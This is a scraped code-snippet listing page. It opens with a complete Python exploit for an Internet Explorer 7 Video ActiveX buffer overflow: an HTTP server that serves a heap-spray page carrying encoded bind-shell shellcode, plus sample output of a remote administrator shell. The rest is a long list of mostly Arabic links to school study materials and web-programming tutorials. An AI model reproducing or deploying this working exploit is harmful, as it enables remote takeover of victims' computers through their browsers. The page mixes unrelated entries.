Result of "HTTP"
-
Action Script
ثغر
=================================================================== MS Internet Explorer 7 Video ActiveX Remote Buffer Overflow Exploit =================================================================== #!/usr/bin/env python ############################################################################### # MS Internet Explorer 7 Video ActiveX Exploit (Advisory 972890) # ############################################################################### # # # Tested on Windows 2003 SP2 R2, XPSP3 IE7 # # # # Written by SecureState R&D Team # # Authors: David Kennedy (ReL1K), John Melvin (Whipsmack), Steve Austin # # http://www.securestate.com # # # # win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind # # # ############################################################################### # # # It's somewhat unreliable, can crash IE at times, found it to be around a 60% # hit. # # This exploit is publicly being exploited in the wild, opted to release this # to the research community. Microsoft is aware of the vulnerability. # ############################################################################### # # # [-] Exploit sent... [-] # [-] Wait about 30 seconds and attempt to connect.[-] # [-]telnet/nc to IP Address: 10.211.55.140 and port 5500 [-] # # relik@sslinuxvm1:~$ telnet 10.211.55.140 5500 # Trying 10.211.55.140... # Connected to 10.211.55.140. # Escape character is '^]'. # Microsoft Windows [Version 5.2.3790] # (C) Copyright 1985-2003 Microsoft Corp. # # C:\Documents and Settings\Administrator\Desktop> from BaseHTTPServer import HTTPServer from BaseHTTPServer import BaseHTTPRequestHandler import sys,binascii try: import psyco psyco.full() except ImportError: pass class myRequestHandler(BaseHTTPRequestHandler): try: def do_GET(self): # Always Accept GET self.printCustomHTTPResponse(200) # Site root: Main Menu if self.path == "/ohn0es.jpg": unhex=binascii.unhexlify("000300001120340000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0c0c0c0c00") self.wfile.write(unhex) if self.path == "/": target=self.client_address[0] self.wfile.write("""<html><head>""") self.wfile.write(""" // Javascript code taken from multiple exploits and exploits that are being actively exploited in the wild <script language="JavaScript" defer> function Check() { // win32_bind - EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai http://metasploit.com */ var shellcode = unescape("%ud9db%u74d9%uf424%uc929%u51b1%u02bf%u6c21%u588e%u7831%u8317%u04c0%u7a03%u8e32%u867b%ua55e%u9ec9%uc666%ua12d%ub2f9%u79be%u4fde%ubd7b%u2c95%uc581%u23a8%u7a02%u30b3%ua44a%uadc2%u2f3c%ubaf0%uc1be%u7cc8%ub159%ubdaf%uce2e%uf76e%ud1c2%ue3b2%uea29%ud066%u79f9%u9362%ua5a5%u4f6d%u2e3f%uc461%u6f4b%udb66%u8ca0%u50ba%ufebf%u7ae6%u3da1%u59d7%u4a45%u6e5b%u0c0d%u0550%u9061%u92c5%ua0c2%ucd4b%ufe4c%ue17d%u0101%u9f57%u9bf2%u5330%u0bc7%ue0b6%u9415%uf86c%u428a%ueb46%ua9d7%u0b08%u92f1%u1621%uad98%ud1df%uf867%ue075%ud298%u3de2%u276f%uea5f%u118f%u46f3%uce23%u2ba7%ub390%u5314%u55c6%ubef3%uff9b%u4850%u6a82%uee3e%ue45f%ub978%ud2a0%u56ed%u8f0e%u860e%u8bd8%u095c%u84f0%u8061%u7f51%ufd61%u9a3e%u78d4%u33f7%u5218%uef58%u0eb2%udfa6%ud9a8%ua6bf%u6008%ua717%uc643%u8768%u830a%u41f2%u30bb%u0496%uddde%u4f38%uee08%u8830%uaa20%ub4cb%uf284%u923f%ub019%u1c92%u19a7%u6d7e%u5a52%uc62b%uf208%ue659%u15fc%u6361%ue547%ud04b%u4b10%ub725%u01cf%u66c4%u80a1%u7797%u4391%u5eb5%u5a17%u9f96%u08ce%ua0e6%u33d8%ud5c8%u3070%u2d6a%u371a%uffbb%u171c%u0f2c%u9c68%ubcf2%u4b92%u92f3"); var bigblock = unescape("%u9090%u9090"); var headersize = 20; var slackspace = headersize + shellcode.length; while (bigblock.length < slackspace) bigblock += bigblock; var fillblock = bigblock.substring(0,slackspace); var block = bigblock.substring(0,bigblock.length - slackspace); while (block.length + slackspace < 0x40000) block = block + block + fillblock; var memory = new Array(); for (i = 0; i < 350; i++){ memory[i] = block + shellcode} var myObject=document.createElement('object'); DivID.appendChild(myObject); myObject.width='1'; myObject.height='1'; myObject.data='./ohn0es.jpg'; myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF'; } </script> </head> <body onload="Check();"> <div id="DivID"> """) self.wfile.write("""<title>MS Internet Explorer 7 Video ActiveX Exploit (Advisory 972890)</title></head><body>""") self.wfile.write("""<left><body bgcolor="Black"><font color="White"><p>Exploit is running...</p><br>""") print ("\n\n[-] Exploit sent... [-]\n[-] Wait about 30 seconds and attempt to connect.[-]\n[-]telnet/nc to IP Address: %s and port 5500 [-]" % (target)) # Print custom HTTP Response def printCustomHTTPResponse(self, respcode): self.send_response(respcode) self.send_header("Content-type", "text/html") self.send_header("Server", "myRequestHandler") self.end_headers() # In case of exceptions, pass them except Exception: pass httpd = HTTPServer(('', 80), myRequestHandler) print (""" ################################################################################### # MS Internet Explorer 7 Video ActiveX Exploit (Advisory 972890) # ################################################################################### # # # Tested on Windows 2003 SP2 R2, WinXPSP3 # # # # Written by SecureState R&D Team # # http://www.securestate.com # # Authors: David Kennedy (ReL1K), John Melvin (Whipsmack), Steve Austin # # # # win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind # # # # It's somewhat unreliable, can crash IE at times, found it to be around a 60% # # hit. # # # # This exploit is publicly being exploited in the wild, opted to release this # # to the research community. Microsoft is aware of the vulnerability # # (Advisory 972890). # # # ################################################################################### """) print ("[-] Starting MS Internet Explorer 7 Video ActiveX Exploit:80 [-]") print ("[-] Have someone connect to you on port 80 [-]") print ("Type <control>-c to exit..") try: # handle the connections httpd.handle_request() # Serve HTTP server forever httpd.serve_forever() # Except Keyboard Interrupts and throw custom message except KeyboardInterrupt: print ("\n\nExiting exploit...\n\n") sys.exit() # 1337day.com [2009-07-10]
22:13 Oct 10 -
Visual Basic
كود تحويل النص الى رقم في C#
من المعروف انك لاتسطيح جمع النص او إذا كان في تكست بوكس هذا الكود تستطيع كتابة النص الى رقم في حالة الجمع بين الاعداد مثال اوضح على كلامي في الرابط التالي http://www.waddah-blog.me/index.php/2011/03/28/collection-setup-mode-via-c-net/
14:27 Apr 04 -
Action Script
Des Sujets
http://www.djelfa.info/vb/showthread.php?t=370630
19:15 Oct 12 2010 -
Action Script
حلول تمارين كتبا الرياضيات
http://leecy.yoo7.com/montada-f148/topic-t8081.htm
20:49 Oct 07 2010 -
Java
Set HTTP Proxy
This snippet sets the HTTP Proxy settings in the system properties, to be automatically used by JVM whenever needed.
15:17 Oct 03 2010 -
Action Script
جميع المذكرات للستة الثالثة ثانوي
http://www.startimes.com/f.aspx?t=25399623
10:29 Oct 02 2010 -
Action Script
كل ما يخص العلوم الطبيعية هنا
http://labbaz.ahlamontada.net/montada-f33/topic-t88.htm
09:55 Oct 02 2010 -
Action Script
17 حوليات في الباكالوريا
http://www.djelfa.info/vb/showthread.php?t=395297
20:22 Oct 01 2010 -
Action Script
مواضيع محلولة
http://www.ziddu.com/download/6752464/physic.rar.html http://www.djelfa.info/vb/showthread.php?t=394158
13:46 Sep 30 2010 -
Action Script
اكبر موسوعة دروس لتلاميذ البكالوريا .... في جميع المواد
http://www.djelfa.info/vb/showthread.php?t=392681
16:43 Sep 28 2010 -
Action Script
* كل التواريخ والأحداث * حصريا لجميع الشعب
http://www.djelfa.info/vb/showthread.php?t=392691
12:31 Sep 28 2010 -
Action Script
Rss
http://www.traidnt.net/vb/showthread.php?t=1679153
17:13 Sep 26 2010 -
Action Script
درس عمل لوحة تحكم مقسمه لجزئين كما في المنتديات والسكريبتات المشهورة
http://www.traidnt.net/vb/showthread.php?p=15220304&posted=1#post15220304
17:12 Sep 26 2010 -
Action Script
موقع رياضيات
http://www.youcefimaths.fedj.ne
22:00 Sep 24 2010 -
Action Script
دروس الفيزياء
http://elearning.midoun.net/physianet/course/index.php?cid=3C1
22:09 Sep 23 2010 -
Action Script
تحضير بكالوريا ( سلاسل تمارين الرياضيات ....) عدد هائل من التمارين _مسائل و تمارين في جميع الدروس + الحل بطريقة رائعة _
http://www.djelfa.info/vb/showthread.php?t=389338
18:52 Sep 21 2010 -
Action Script
دروس علوم
http://www.latreche-mifa.xdir.org/Sciences3AS/Sciences3AS-1.pdf
12:38 Sep 20 2010 -
Action Script
موسوعة رائعة للاختبارات والفروض جميع المواد جميع الشعب وجميع الفصول
http://www.djelfa.info/vb/showthread.php?t=381291
11:26 Sep 17 2010 -
Action Script
http://www.djelfa.info/vb/showthread.php?t=381281
& جميع دروس وتمارين وكتب وحلولها الثالثة ثانوي ومراجع واختبارات & والمزيد المزيد &
11:23 Sep 17 2010 -
Action Script
مواقع تعليمية
http://ency-education3.weebly.com/ www.cndp.dz www.cniipdtice.dz www.infpe.edu.dz
14:33 Sep 16 2010 -
Action Script
البرمجة الآمنة في البي اتش بي
http://www.traidnt.net/vb/showthread.php?t=1654198
14:30 Sep 16 2010 -
Action Script
منتدى جيد للباكالوريا
http://smahi.montadamoslim.com/montada-f63/
18:49 Sep 15 2010 -
Action Script
مواقع مفيدة جدا ( لغات اجنبية )
http://www.djelfa.info/vb/showthread.php?t=385287
18:38 Sep 15 2010 -
Action Script
دليل الاستاد+حلول تمارين الكتاب:علوم+ رياضيات +فيزياء+انجليزية
http://www.djelfa.info/vb/showthread.php?t=197706
11:23 Sep 13 2010 -
Action Script
best tutirials jQuery and ajax
http://net.tutsplus.com/
22:19 Sep 12 2010 -
Action Script
قرص رائع جدا كل ما تحتاجه في الرياضيات هنا
http://www.4shared.com/file/147264463/7c3193b/__labbazahlamontadanet.html
13:58 Sep 11 2010 -
Action Script
موسوعة هائلة من تمارين الرياضيات
http://educ-dz.cz.cc/08/الموسوعة-الهائلة-لتمارين-الرياضيات/#more-316
13:50 Sep 11 2010 -
Action Script
كتاب ممتاز في التايخ والجغرافيا
http://www.djelfa.info/vb/showthread.php?t=382520
22:19 Sep 10 2010 -
Action Script
مذكرات علوم شرعية
http://www.djelfa.info/vb/showthread.php?t=382531
22:18 Sep 10 2010 -
Action Script
تعليم الفرنسية
http://www.djelfa.info/vb/showthread.php?t=382422
13:10 Sep 09 2010 -
Action Script
مجموعة كبيرة من التمارين في العلوم الفزيائية مع حلولها
http://www.djelfa.info/vb/showthread.php?t=380291
00:35 Sep 08 2010 -
Action Script
آلاف المواضيع في جميع المواد ( باكالوريا )
http://www.djelfa.info/vb/showthread.php?t=381291
16:20 Sep 07 2010 -
Action Script
الحقيبة الشاملة للباك مهم جدا
http://www.djelfa.info/vb/showthread.php?t=379296
18:55 Sep 04 2010 -
Action Script
سلايد شو رائع بالاجاكس والسي اس سي
http://www.traidnt.net/vb/showthread.php?t=1395674
17:41 Sep 02 2010 -
Action Script
دروس برمجة سكريبتات
http://www.traidnt.net/vb/showthread.php?t=1469802
21:45 Sep 01 2010 -
Action Script
اهم الوسوم البرمجية
http://www.traidnt.net/vb/showthread.php?p=15027639&posted=1#post15027639
17:07 Sep 01 2010 -
Action Script
مذكرات العلوم الطبيعية
http://www.mediafire.com/?ebgza4sfcyfdedo
12:28 Sep 01 2010 -
Action Script
مواقع تعليمية للباكالوريا
http://www.djelfa.info/vb/showthread.php?t=208165
12:23 Sep 01 2010 -
Action Script
ملخصات هامة للباك
http://www.djelfa.info/vb/showthread.php?t=358131
18:16 Aug 24 2010 -
Action Script
اكثر من 800 موضوع في جميع المواد
http://www.djelfa.info/vb/showthread.php?t=365806
14:02 Aug 22 2010 -
Action Script
ajax video
http://www.traidnt.net/vb/showthread.php?t=1232354
12:44 Aug 22 2010 -
Action Script
كلمات مهمة في فقرات الانجليزية
http://www.djelfa.info/vb/showthread.php?t=370248
17:15 Aug 21 2010 -
Action Script
ملخصات كثيرة
http://www.djelfa.info/vb/member.php?u=260614
17:12 Aug 21 2010 -
Action Script
أيقونات رائعة جدا
http://www.crystalxp.net/galerie/en.cat.1.htm
18:56 Aug 19 2010 -
Action Script
lقالات اجنبية جيدة
http://www.white-hat-web-design.co.uk/scripting.php
20:08 Aug 14 2010 -
Action Script
http://www.9lessons.info/
http://www.9lessons.info/http://www.9lessons.info/
20:12 Aug 10 2010 -
Action Script
الحذف بالAjax وال JQuery
http://www.traidnt.net/vb/showthread.php?t=1636773
21:46 Aug 07 2010 -
javascript
XMLHTTPRequest(AJAX)
how to use xmlhttprequest to post a request with parameters in javascript.
16:11 Jul 29 2010 -
Action Script
httpservice with parameters
Implementing httpservice with parameters in flex and AS3.
16:05 Jul 29 2010 -
Action Script
المكتبة الشاملة لكل ما يخص الباكالوريا
http://muslimstudent.super-forum.net/montada-f20/topic-t621.htm
10:51 Jul 28 2010 -
Action Script
موقع تعليمي مفيبد
http://www.fanit-mehdi.com/
20:12 Jul 27 2010 -
Action Script
توتريال
http://www.tutoriale.far-php.ro/
18:50 Jul 27 2010 -
Action Script
احسن المواقع التعليمية
http://www.bacdz.comule.com/ تحضير للباك http://www.infpe.edu.dz/ تعليم ثانوي http://www.zshare.net/download/78513331b8e69003/ حقيبة الممتحن http://djelfa.info/vb/showthread.php?t=178171 حلول تمارين الكتاب المدرسي http://djelfa.info/vb/showthread.php?t=266016 حلول المات
11:09 Jul 27 2010 -
Action Script
افضل مواضيع البرمجة
http://www.traidnt.net/vb/showthread.php?p=12892709
00:35 Jul 27 2010 -
Action Script
best demos
http://tutorialzine.com/
23:31 Jul 26 2010 -
Action Script
best demos
http://tutorialzine.com/
23:30 Jul 26 2010 -
Action Script
تعلم الـ oop
http://php.net/manual/en/language.oop5.php
20:58 Jul 26 2010 -
Action Script
شرح مختصر لحركات css
http://www.ojuba.org/wiki/docs/css_tutorial
20:50 Jul 26 2010 -
Action Script
OOP
http://www.arabteam2000-forum.com/index.php?showtopic=49569
17:35 Jul 26 2010 -
Action Script
صغيرة جدا ومُفيدة لتسريع عرض صور الموقع ومستخدمة بمواقع شهيرة
http://www.traidnt.net/vb/showthread.php?t=1626284
17:19 Jul 26 2010 -
Action Script
كيفية عمل اكثر من استايل للصفحه ، مع امكانية الاختيار للزوار
http://www.traidnt.net/vb/showthread.php?t=1625781
17:18 Jul 26 2010 -
Action Script
تعلم إختيار الالوان
http://bb.cliprz-php.com/showthread.php?tid=149
13:00 Jul 26 2010 -
Action Script
التاثير على الفورم ب الجافا و لغة الانماط
http://bb.cliprz-php.com/showthread.php?tid=134
12:37 Jul 26 2010 -
javascript
اعلان مثل رسالة الماسنجر
اعلان مثل رسالة الماسنجر يختفى بعد الوقت الذى تحدده طريقة التركيب انسخ الكود و ضعه في منطقة BODY حمل ملف اسمه و عدل به ما يناسبك http://www.star28.com/java/java6/msn.zip
20:25 Jul 25 2010 -
php
التعامل مع API خدمة gravatar
للحصول على صورة صاحب الإيميل إن كان مسجل في خدمة gravatar إستعمل الكود الموجود بالأسفل , لمعلومات أكثر : http://en.gravatar.com/site/implement/hash/
07:26 Jul 25 2010 -
php
Video Embed Class
for embed video enter video link : http://www.youtube.com/watch?v=FCO7BATU1g0 and can embed video from : youtube, Google Video, Metacafe, Megavideo, Myspace. Sort the embed code
21:48 Jul 12 2010
